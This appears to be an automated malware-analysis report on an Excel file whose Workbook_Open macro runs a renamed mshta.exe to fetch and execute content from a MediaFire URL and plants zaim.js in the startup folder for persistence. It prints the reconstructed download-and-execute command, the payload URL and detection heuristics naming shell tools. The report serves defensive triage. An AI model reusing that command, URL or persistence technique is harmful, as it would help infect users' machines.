Malware Insights
The sample contains a Workbook_Open macro that executes a command. The script reconstructs the command to be 'wscript C:\ProgramData\mong.com', where 'mong.com' is a copy of mshta.exe. This command is then executed with the argument 'C:\ProgramData\mong.com https://www.mediafire.com/file/s8z2kf4phq9wqbz/11.htm/file', which will launch mshta.exe to download and execute content from the provided URL. Additionally, the script attempts to copy 'zaim.js' to the user's startup folder for persistence. The heuristic 'SE_CLIPBOARD_COMMAND_LURE' indicates the document likely instructs the user to manually paste commands, further supporting the malicious intent.
Heuristics 6
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
VBA project inside OOXML medium OOXML_VBADocument contains vbaProject.bin — VBA macros present
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.mediafire.com/file/s8z2kf4phq9wqbz/11.htm/file
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basd186117592d34b5fb842bed9f6ee9bc4530e9e2115df4abb53f0810057b81c01 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10331 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
vbaProject_00.bin04a0a0a466cacf276e31f0a6e14c94d1e475b0fae2b22cce87c4af3e6b66918c |
vba-project | OOXML VBA project: xl/vbaProject.bin | 43008 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.